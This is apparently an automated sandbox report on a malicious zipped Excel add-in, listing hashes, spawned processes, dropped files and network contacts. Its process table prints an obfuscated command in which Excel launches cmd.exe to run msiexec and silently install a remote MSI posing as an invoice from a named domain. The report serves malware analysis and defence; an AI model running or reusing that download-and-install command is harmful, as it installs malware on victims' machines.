File name: | 9bb6656ef5b2d47ecaf0.zip |
Full analysis: | https://app.any.run/tasks/8765d281-57cf-4005-a05f-20c84f52bae5 |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 16:45:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C6D8A7DDDE85B182605F1D727A87262D |
SHA1: | DC8D8A1D8D47BAB0C8E9419B7D6A6F944883033D |
SHA256: | 52E6C54B31807659B3515986BECA484A886C7610BEAD6403C1270C28827D962D |
SSDEEP: | 384:mgCrPfhivZya/PiKIXn4cmA2QO04+ZRAjV7K:mIn3iJ34s9RZRAjc |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:10:09 16:44:26 |
ZipCRC: | 0xf1e14ef0 |
ZipCompressedSize: | 13356 |
ZipUncompressedSize: | 15740 |
ZipFileName: | 9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
384 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\9bb6656ef5b2d47ecaf0.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3176 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3392 | "C:\Windows\System32\cmd.exe" /c mSIe^X^eC /i https://paragonhospital.ug/wp-content/uploads/2019/09/office/invoice-31299-pdf.msi /qn | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1504 | mSIeXeC /i https://paragonhospital.ug/wp-content/uploads/2019/09/office/invoice-31299-pdf.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3204 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
384 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb384.8785\9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.bin | — | |
MD5:— | SHA256:— | |||
3176 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA450.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3176 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:1C774EF2A2764D39ECA9F5D773245421 | SHA256:521D7D96C9C6F9133C993ED4FC77BB14D13578F98905E5AF0C06D3237FB7581C | |||
3176 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.xlam.LNK | lnk | |
MD5:CCCC8D04E9EB486B610C6E70E305F026 | SHA256:487C3C9F6E5B3C99B064132EDC2B487F79C4151D4A45480CC743447E2B1F9373 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3204 | msiexec.exe | 157.230.235.238:443 | paragonhospital.ug | Joao Carlos de Almeida Silveira trading as Bitcanal | US | unknown |
Domain | IP | Reputation |
---|---|---|
paragonhospital.ug |
| unknown |